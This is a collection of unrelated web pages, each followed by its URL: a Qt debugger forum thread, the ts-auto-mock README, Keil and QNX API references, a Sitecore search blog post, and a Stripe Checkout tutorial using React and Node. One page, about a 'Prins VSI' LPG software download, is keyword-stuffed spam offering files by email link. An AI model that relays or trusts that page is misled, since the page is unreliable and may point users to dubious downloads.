The Deployment wizard has been added for creating deployments of SQL Anywhere for Windows. The Deployment wizard can be used to create both Microsoft Windows Installer package files and Microsoft Windows Installer Merge Module files. The InstallShield merge modules and templates provided with previous versions of SQL Anywhere are no longer supplied. Instead, use the Deployment wizard to create SQL Anywhere deployments. See Using the Deployment Wizard.
http://dcx.sap.com/1101/en/sachanges_en11/newjasper-s-3641153.html
QtCreator debugger not behaving deterministically

Karlovsky120 last edited by

I'm trying to debug a Qt application, but I'm having several issues.

Firstly, when I hit a breakpoint (or when the program gets to a stationary state, such as an open window waiting for user input), the application output just stops: mid-string, with 30 more strings in the buffer. I've tried flushing the buffer before the breakpoint, but to no avail.

Secondly, I have bugs that disappear when I place breakpoints at a certain part of the code (mainly somewhere prior to the bug).

I've tried this on three different machines: a MacBook Air (early 2015, Mojave), an iMac (27", late 2013, Catalina), and a hackintosh VM (Catalina). Other colleagues are working on the same project; nobody else has the problem. My WTR on the iMac has literally been: install the OS, download Qt Creator, install Qt Creator, clone the project repository, run the debug build. I never changed the default kits or any settings in Qt Creator.

My current working theory is that Apple has my picture, hates me, and makes Macs act stupid if they detect me in front of them. I have no other theories that would make more sense at this point, so I'm open to any suggestions.

@Karlovsky120 said in QtCreator debugger not behaving deterministically:

Other colleagues are working on the same project, nobody else has the problem.

That's worrying :( Especially if you say you try it on different machines and it only goes wrong for you.

My current working theory is that Apple has my picture, hates me and makes macs act stupid if they detect me in front of them

If what you describe is true, this seems like the most likely explanation ;-)

One thing you should certainly do is make sure the "debug" folder is absolutely empty before you do a full rebuild. Any artefacts lying around could result in odd behaviour.
I don't know how it works on Mac, but make sure your compiler/debugger themselves are correctly installed, can they be uninstalled/reinstalled? Secondly, I have bugs that disappear when I place breakpoints at a certain part of the code (mainly somewhere prior to the bug). Unfortunately, this is actually not totally impossible/incorrect. For example, this has happened to me in Qt code to do with signals/slots because of timing code buried in Qt which causes different behaviour in debugger against not in debugger, or how you actually step through in debugger. Also "uninitialized/incorrect" memory data can show up in different ways as you debug/run your code, and in that sense you should regard it as causing potentially "non-deterministic" behaviour. I hope I'm not speaking out of turn, but from what you describe (especially with it working for other people, but not working for you across multiple machines) I don't see how anyone reading this will be able to pinpoint your problem, I'm afraid? However, you might state the exact versions of Qt/Qt Creator/compiler/debugger you are using in case those are relevant. Oh, and does the "bad debugger" happen to you on a minimal project (e.g. a "Hello World"), or only on your actual fair-sized project code? - Karlovsky120 last edited by Yeah, I was a bit stingy with the information. However, I've since discovered that the debugger behavior is consistent, at least when it comes to breakpoints and general code behavior, the only issue is that stopping at a breakpoint stops the program output. 
For example, the following program gives this output when it hits the breakpoint: #include <QDebug> #include <unistd.h> int main(int argc, char *argv[]) { for (int i = 0; i < 20; ++i) { qDebug() << "Printing line " << i << "\n"; } int a = 0; // <-breakpoint here } 07:50:37: Debugging starts 2020-09-04 07:50:44.162658-0700 editor[3615:65377] Printing line 0 2020-09-04 07:50:44.162689-0700 editor[3615:65377] Printing line 1 2020-09-04 07:50:44.162695-0700 editor[3615:65377] Printing line 2 2020-09-04 07:50:44.162699-0700 editor[3615:65377] Printing line 3 2020-09-04 07:50:44.162702-0700 editor[3615:65377] Printing line 4 2020-09-04 07:50:44.162706-0700 editor[3615:65377] Printing line 5 2020-09-04 07:50:44.162709-0700 editor[3615:65377] Printing line 6 2020-09-04 07:50:44.162713-0700 editor[3615:65377] Printing line 7 2020-09-04 07:50:44.162716-0700 editor[3615:65377] Printing line 8 2020-09-04 07:50:44.162720-0700 editor[3615:65377] Printing line 9 2020-09-04 07:50:44.162724-0700 editor[3615:65377] Printing line 10 2020-09-04 07:50:44.162727-0700 editor[3615:65377] Printing line 11 2020-09-04 07:50:44.162731-0700 editor[3615:65377] Printing line 12 2020-09-04 07:50:44.162735-0700 editor[3615:65377] Printing line 13 2020-09-04 07:50:44.162751-0700 editor[3615:65377] Pri It just stops mid string like this. I've tried redirecting output to the terminal, but that just exits right away, without outputting anything. If I add usleep(20000); above the print line, it will print out all (20) of the strings. If I add usleep(10000); it will get to number 16. I'm using QtCreator 4.13.0, Qt 5.15.0. I'm using Clang that came with MacOS Catalina (x86 64bit in /usr/bin). I'm using LLDB that came with it (also in /usr/bin/lldb). This is a fresh install of the OS, there is nothing else installed on the system except the programs that came with it. MacOS version is 10.15.5.
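One thing worth trying for the truncated-output symptom (my own suggestion, not from the thread: it assumes the loss happens in stdio buffering between the debugged process and Creator's output pane) is to force unbuffered standard streams at the top of main():

```cpp
#include <cstdio>

// Make stdout/stderr unbuffered so each line reaches the debugger's
// output pane immediately, instead of sitting in a stdio buffer while
// the process is stopped at a breakpoint.
// Returns 0 on success, -1 if either stream could not be switched.
int disableOutputBuffering()
{
    int out = std::setvbuf(stdout, nullptr, _IONBF, 0);
    int err = std::setvbuf(stderr, nullptr, _IONBF, 0);
    return (out == 0 && err == 0) ? 0 : -1;
}
```

Call it before any output is written. Whether qDebug() on macOS actually routes through these streams depends on the Qt logging backend in use, so treat this as a diagnostic experiment rather than a guaranteed fix.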
https://forum.qt.io/topic/118711/qtcreator-debugger-not-behaving-deterministically
TS auto mock

Need help? Join us on Slack

A TypeScript transformer that will allow you to create mocks for any types (interfaces, classes, etc.) without the need to create manual fakes/mocks.

API Documentation
Installation
Usage

Quick overview

import { createMock } from 'ts-auto-mock';

interface Person {
  id: string;
  getName(): string;
  details: {
    phone: number;
  };
}

const mock = createMock<Person>();
mock.id // ""
mock.getName() // ""
mock.details // "{ phone: 0 }"

- If you are interested in using it with jasmine, please go to jasmine-ts-auto-mock
- If you are interested in using it with jest, please go to jest-ts-auto-mock

Changelog

Find the changelog here: Changelog.

Roadmap

You can find the roadmap of this project on the Wiki page: Roadmap.

Do you want to contribute?

Authors

Contributors ✨

Thanks go to these wonderful people (emoji key):

This project follows the all-contributors specification. Contributions of any kind welcome!

License

This project is licensed under the MIT License.
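To see what the transformer saves you from writing, here is a hand-written equivalent of the mock it generates for the Person example above (illustration only: the real object is produced at compile time by the transformer; the defaults of empty string and zero match the quick overview):

```typescript
interface Person {
  id: string;
  getName(): string;
  details: { phone: number };
}

// Hand-written equivalent of createMock<Person>(): every string defaults
// to "", every number to 0, and methods return their return type's default.
const personMock: Person = {
  id: "",
  getName: () => "",
  details: { phone: 0 },
};
```

For a three-property interface this is trivial, but the transformer does the same recursively for arbitrarily nested types, which is where maintaining such fakes by hand stops scaling.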
https://www.npmjs.com/package/ts-auto-mock
Lpg Prins Vsi Software [UPDATED] Download

Lpg Prins Vsi Software Download

Prins VSI (VSI 1) LPG transformer, regulators, fuel tank, and pump. Prins VSI LPG System Software. Prins VSI Configuration Software Main Menu – 8006E001. 1) Prins VSI LPG fuel system software. The new/latest download version of the VSI Configuration Software for the Prins VSI fuel system is 1.1. Prins VSI LPG Fuel Configuration Software. Our company, serving our customers, welcomes you to the Prins LPG & CNG delivery program for modern DI engines! Click here to download.

Photos of plans and requirements for the Prins VSI

Prins VSI LPG Configuration and Diagnostic Software – Business Edition. Free Prins VSI download software at UpdateStar – 1,746,000 recognized programs. The VSI system is available in an LPG as well as a CNG version and is also suitable for the latest generation. Prins VSI 2 software parameters found at bexprins.de, prinsautogas. Software to diagnose and configure Prins VSI systems. Prins Autogassystemen BV, a partner of SHV Gas, has been a world leader in the development of alternative fuel systems. BEXPRO-NS Business Edition software for Prins VSI 1 – DOWNLOAD, which has been programmed to help you configure the Prins VSI LPG system. The VSI system is the most advanced vapour injection system on the market. High-quality components; unique diagnostic software; optimal performance. The number of LPG and CNG systems for cars with a direct-injection fuel system is growing. If you require more information, you can download our brochure or contact us.

Prins VSI Diagnostic Software. All files will be sent as a download link to your email address within hours. Components; advanced calibration possibilities; diagnostic software in native language. The entirely new Prins VSI-2.0 system is the latest development. LPG reducer.
https://hhinst.com/advert/lpg-prins-vsi-software-updated-download/
Technical Support On-Line Manuals

RL-ARM User's Guide (MDK v4)

#include <net_config.h>

BOOL modem_process (
    U8 ch );      /* New character sent by the modem. */

The modem_process function processes characters that the local modem sends to the TCPnet system. The function stores each character in a buffer and checks the buffer for a valid modem response. The argument ch is the new character that is available from the modem.

The modem_process function for the null modem is in the RL-TCPnet library. The prototype is defined in net_config.h. If you want to use a standard modem connection, you must copy std_modem.c into your project directory.

note

The modem_process function returns __TRUE when it receives the response "CONNECT" from the local modem. This means that the local modem has connected to the remote modem. Otherwise, it returns __FALSE.

modem_online, modem_run

BOOL modem_process (U8 ch) {
  /* Modem character process event handler. This function is called when */
  /* a new character has been received from the modem in command mode    */

  if (modem_st == MODEM_IDLE) {
    mlen = 0;
    return (__FALSE);
  }
  if (mlen < sizeof(mbuf)) {
    mbuf[mlen++] = ch;
  }

  /* Modem driver is processing a command */
  if (wait_for) {
    /* 'modem_run()' is waiting for modem reply */
    if (str_scomp (mbuf,reply) == __TRUE) {
      wait_for = 0;
      delay    = 0;
      if (wait_conn) {
        /* OK, we are online here. */
        wait_conn = 0;
        modem_st  = MODEM_ONLINE;
        /* Inform the parent process we are online now. */
        return (__TRUE);
      }
    }
  }

  /* Watch the modem disconnect because we do not use CD line */
  if (mem_comp (mbuf,"NO CARRIER",10) == __TRUE) {
    set_mode ();
  }
  if (ch == '\r' || ch == '\n') {
    flush_buf ();
  }

  /* Modem not connected, return FALSE */
  return (__FALSE);
}
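The example above depends on driver globals (modem_st, mbuf, wait_for, and so on), but the core response-matching idea can be sketched in portable, self-contained C. The reply_matcher type and function names below are my own, for illustration only:

```c
#include <string.h>

/* Simplified sketch of the matching done in modem_process():
   accumulate incoming characters and report success once the buffer
   contains the expected modem reply ("CONNECT"). */
typedef struct {
    char buf[64];
    unsigned len;
} reply_matcher;

/* Feed one character; returns 1 once "CONNECT" has been seen. */
int feed_char(reply_matcher *m, char ch)
{
    if (m->len < sizeof(m->buf) - 1) {
        m->buf[m->len++] = ch;
        m->buf[m->len] = '\0';
    }
    return strstr(m->buf, "CONNECT") != NULL;
}

/* Feed a whole string of modem output, character by character. */
int feed_string(reply_matcher *m, const char *s)
{
    int connected = 0;
    while (*s)
        connected |= feed_char(m, *s++);
    return connected;
}
```

The real driver additionally resets the buffer on line endings and watches for "NO CARRIER" to detect disconnects, since the CD line is not used.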
https://www.keil.com/support/man/docs/rlarm/rlarm_modem_process.htm
Many Sitecore developers these days use the Advanced Database Crawler (ADC) as their interface into the Lucene.NET world. The ADC is a great tool because it builds on top of the Sitecore.Search namespace which in its own right wraps over Lucene.NET. Many Sitecore instances will contain multiple sites and share data across them. Sometimes its necessary to build a site-specific search mechanism that functionally works the same for each site, but ensures results are only for the given site. This blog post will go over two simple ways to accomplish this with the Advanced Database Crawler. Location Filter The easiest way to accomplish this task to filter results by a managed site is to use the LocationIds filter on the search parameter object. This location filter will only return SkinnyItem results that fall at or under the provided location. The LocationIds also happens to be a delimited list of GUIDs, so we can easily leverage this to filter results by site: - Get the context site path - Filter with the ADC using LocationIdsby passing the home page’s or site root’s GUID For example, here’s some basic code to do just that: Item homeItem = Sitecore.Context.Database.GetItem(Sitecore.Context.Site.StartPath); if(homeItem != null) { searchParams.LocationIds = homeItem.ID.ToString(); } This example assumes your home page is below the site root path, which is common if you have some other data items for your site that are not pages. Full Path Dynamic Field Another way to do the same type of operation takes a bit more work and doesn’t necessarily yield any better results, however it’s good to have options! This approach requires to you define a dynamic field in your index for the full path of each item. If you’re using v1 of the ADC, this exists as the “_fullcontentpath” dynamic field. If you’re using the ADC v2, you’ll need to define it (grab it from here). 
Once you configure that dynamic field, simply write some code to compare the skinny items from a search operation based on the full path vs. the context site’s start path. Here’s an example: public static IEnumerable<SkinnyItem> FilterSkinnyItemsByContextSite(IEnumerable<SkinnyItem> items) { return FilterSkinnyItemsBySite(items, Sitecore.Context.Site); } public static IEnumerable<SkinnyItem> FilterSkinnyItemsBySite(IEnumerable<SkinnyItem> items, Sitecore.Sites.SiteContext site) { return FilterSkinnyItemsByRootPath(items, site.RootPath); } public static IEnumerable<SkinnyItem> FilterSkinnyItemsByRootPath(IEnumerable<SkinnyItem> items, string siteRootPath) { // isolate the path query to a finite item path, not a prefix of a longer path // e.g. ensures a filter on /sitecore/content/brand as /sitecore/content/brand/ to avoid allowing /sitecore/content/brand2 if (!siteRootPath.EndsWith("/")) siteRootPath = siteRootPath + "/"; return items.Where(si => si.Fields["_fullcontentpath"].StartsWith(siteRootPath, StringComparison.InvariantCultureIgnoreCase)); } As I said before, leveraging the LocationIds filter at the search-level is easier and more efficient as it won’t return unnecessary results. The second approach is good if you have existing search code that you don’t want to adjust too much and instead want to easily filter the results by site. 3 thoughts on “Sitecore Search by Site with the Advanced Database Crawler” I would like to index the full path, but where exactly do I put the code snippet you give that defines FullPathField? There are two links in the post you should look at, the sample config file that defines the field and the class that resolves the value of the field:
https://firebreaksice.com/sitecore-search-by-site-with-the-advanced-database-crawler/
Create a reference to a stream

#include <screen/screen.h>

int screen_ref_stream(screen_stream_t stream)

Function Type: Immediate Execution

This function creates a reference to a stream. This function can be used by libraries to prevent the stream or its buffers from disappearing while the library is using it. The stream and its buffers aren't destroyed until all references have been cleared with screen_unref_stream(). In the event that a stream is destroyed before the reference is cleared, screen_unref_stream() causes the stream buffer and/or the stream to be destroyed.

Returns:

0 if successful, or -1 if an error occurred (errno is set; refer to errno.h for more details).
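The lifetime contract can be illustrated with a toy reference counter in portable C (this is not the Screen implementation; the type and function names are invented for the illustration): destruction is deferred until both the destroy request has been made and the last reference is released.

```c
/* Toy model of the ref/unref lifetime contract. */
typedef struct {
    int refs;              /* outstanding library references   */
    int destroy_requested; /* owner has asked for destruction  */
    int destroyed;         /* set once teardown actually runs  */
} stream_t;

static void maybe_destroy(stream_t *s)
{
    if (s->destroy_requested && s->refs == 0)
        s->destroyed = 1;
}

void stream_ref(stream_t *s)     { s->refs++; }
void stream_unref(stream_t *s)   { s->refs--; maybe_destroy(s); }
void stream_destroy(stream_t *s) { s->destroy_requested = 1; maybe_destroy(s); }
```

This is why a library holding a reference can keep using the stream's buffers even after the owner has requested destruction: teardown only happens at the final unref.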
http://www.qnx.com/developers/docs/7.0.0/com.qnx.doc.screen/topic/screen_ref_stream.html
In this article, we will learn how to integrate Stripe Checkout with React, using Hooks and Node.js. (If you would rather use Angular, here's a guide we created for that.)

What is Stripe Checkout?

Stripe Checkout is a fully responsive and secure payment page hosted by Stripe. It lets you quickly receive payments and removes the friction of developing a compliant checkout page.

Goal

Today, we will learn:

1. How to create a product in your Stripe dashboard.
2. How to integrate that product in our React checkout component.
3. How to communicate with our server and redirect to the Stripe Checkout page.

Prerequisites

- Basic knowledge of React and React Hooks.
- Node.js version 10 or later
- React 16.8 or later

Create a Product

Before we start coding, let's create a sample product which we will display on our checkout page.

1. Create a Stripe account

Note: All product-related data and keys will be created in the developers' "test mode". Sensitive data for production should be saved securely in your .env files.

- Head over to Stripe's website and create an account.
- Upon creating your account, you will be directed to your dashboard page.

2. Create a Product

To do this, click on the Products link in the sidebar and click the "Add Product" button. You can fill in the product details as shown below. Also, make sure you save the product and copy the price API ID for later use.

Stripe Checkout Integration

Integrating our Stripe product requires two steps: setting up our Node server and calling our Stripe product API in our React app.

1. Create-react-app

Let's create our project using create-react-app with the command below:

npx create-react-app stripe-react-app

2. Set up a Node Express server

Next, we have to set up our Node server. To do this, we will install express and concurrently. Concurrently will allow us to run our Node server and React app at the same time.

npm i concurrently; npm i express

3.
Install Stripe

To use Stripe in our app, we will install three packages: stripe, @stripe/react-stripe-js, and @stripe/stripe-js. Here's the final version of our package.json file:

{ "name": "stripe-react-app", "version": "0.1.0", "private": true, "dependencies": { "@stripe/react-stripe-js": "^1.4.1", "@stripe/stripe-js": "^1.17.0", "@testing-library/jest-dom": "^5.11.4", "@testing-library/react": "^11.1.0", "@testing-library/user-event": "^12.1.10", "concurrently": "^6.2.1", "express": "^4.17.1", "react": "^17.0.2", "react-dom": "^17.0.2", "react-scripts": "4.0.3", "stripe": "^8.169.0", "web-vitals": "^1.0.1" }, "homepage":"", "proxy": "", "scripts": { "start-client": "react-scripts start", "start-server": "node server.js", "start": "concurrently \"yarn start-client\" \"yarn start-server\"", "build": "react-scripts build", "test": "react-scripts test", "eject": "react-scripts eject" }, "eslintConfig": { "extends": [ "react-app", "react-app/jest" ] }, "browserslist": { "production": [ ">0.2%", "not dead", "not op_mini all" ], "development": [ "last 1 chrome version", "last 1 firefox version", "last 1 safari version" ] } }

You will notice how we set values for proxy and homepage. Similarly, we also used concurrently to start our Node server and React app at the same time.

7. Server.js

Create a server.js file in our home directory. Inside our server.js file, we will:

- Instantiate the required packages
- Create an API route: create-checkout-session.
In this route, we define payment_method_types, the price and quantity of the line item, and the success_url and cancel_url. The final version of server.js:

```javascript
const stripe = require('stripe')('sk_test_***************************************');
const express = require('express');
const app = express();
app.use(express.static('.'));

const YOUR_DOMAIN = '';

app.post('/create-checkout-session', async (req, res) => {
  const session = await stripe.checkout.sessions.create({
    payment_method_types: ['card'],
    line_items: [
      {
        // TODO: replace this with the `price` of the product you want to sell
        // price: '{{PRICE_ID}}',
        price: 'price_*************',
        quantity: 1,
      },
    ],
    mode: 'payment',
    success_url: `${YOUR_DOMAIN}?success=true`,
    cancel_url: `${YOUR_DOMAIN}?canceled=true`,
  });

  res.redirect(303, session.url);
});

app.listen(5000, () => console.log('Running on port 5000'));
```

You can find your secret API key in your dashboard; it starts with sk_test. This file is also where you use the price ID you copied when creating the product.

## Frontend: React App

In this section, we build our frontend components. The frontend comprises a main page that houses the product card, and a result view that shows whether the checkout was successful.

### Product Card

- First, create a components folder inside the src folder to house our frontend files.
- Next, create ProductDisplay.js and Message.js. ProductDisplay.js renders the product card, and Message.js displays the message returned from Stripe Checkout.
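The product card we are about to build submits a plain HTML form POST to /create-checkout-session. One hedged note on development wiring (an assumption on our part, since the article leaves the proxy field blank): with server.js listening on port 5000 and the CRA dev server on its default port 3000, the proxy field in package.json would typically point at the Express server so that this request is forwarded:

```json
{
  "proxy": "http://localhost:5000"
}
```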
```javascript
export const ProductDisplay = () => (
  <div className="wrapper">
    <div className="product-img">
      <img src="" alt="Orchid Flower" height="420" width="327" />
    </div>
    <div className="product-info">
      <div className="product-text">
        <h1>Orchid Flower</h1>
        <h2>POPULAR HOUSE PLANT</h2>
        <p>
          The Orchidaceae are a diverse and <br />
          widespread family of flowering plants, <br />
          with blooms that are often <br />
          colourful and fragrant.{" "}
        </p>
      </div>
      <form action="/create-checkout-session" method="POST">
        <div className="product-price-btn">
          <p>
            <span>$20</span>
          </p>
          <button type="submit">buy now</button>
        </div>
      </form>
    </div>
  </div>
);
```
ProductDisplay.js

```javascript
export const Message = ({ message }) => (
  <section>
    <p>{message}</p>
    <a className="product-price-btn" href="/">
      <button type="button">Continue</button>
    </a>
  </section>
);
```
Message.js

And here's our App.js file, where both components are used:

```javascript
import React, { useState, useEffect } from "react";
import "./App.css";
import { ProductDisplay } from "./components/ProductDisplay";
import { Message } from "./components/Message";

export default function App() {
  const [message, setMessage] = useState("");

  useEffect(() => {
    // Check to see if this is a redirect back from Checkout
    const query = new URLSearchParams(window.location.search);
    if (query.get("success")) {
      setMessage("Yay! Order placed! 🛒 You will receive an email confirming your order.");
    }
    if (query.get("canceled")) {
      setMessage("Order canceled -- please try again.");
    }
  }, []);

  return message ? <Message message={message} /> : <ProductDisplay />;
}
```

## Project Structure

The final structure is simple: server.js and package.json sit in the project root, while the React code lives under src (App.js plus the components folder with ProductDisplay.js and Message.js).

Run npm start to start the project. Stripe provides a set of test card numbers in its documentation, which you can use to try out the Stripe Checkout page.

## Summary

There you have it. With Stripe Checkout and React, you can create a seamless eCommerce experience for your customers. I hope that you have enjoyed reading this article.
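One last aside: the redirect check inside App.js's useEffect is plain JavaScript, so it can be exercised outside React. A sketch under that assumption (the extracted function name checkoutMessage is ours):

```javascript
// Sketch of App.js's redirect detection as a pure function: given the
// query string Stripe redirects back with, return the message to show.
function checkoutMessage(search) {
  const query = new URLSearchParams(search);
  if (query.get("success")) {
    return "Yay! Order placed! You will receive an email confirming your order.";
  }
  if (query.get("canceled")) {
    return "Order canceled -- please try again.";
  }
  return ""; // no redirect params: the product card is shown instead
}

console.log(checkoutMessage("?success=true"));
console.log(checkoutMessage("?canceled=true"));
```

Because the success_url and cancel_url in server.js append ?success=true and ?canceled=true, these two inputs cover both redirect outcomes.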
Feel free to share this article and add your comments; we are always eager to hear the opinions of fellow developers.

## Unimedia Technology

Here at Unimedia Technology we have a team of React developers who can help you build your most complex Stripe integrations.
https://www.unimedia.tech/2021/08/17/stripe-checkout-integration-with-react/?lang=ca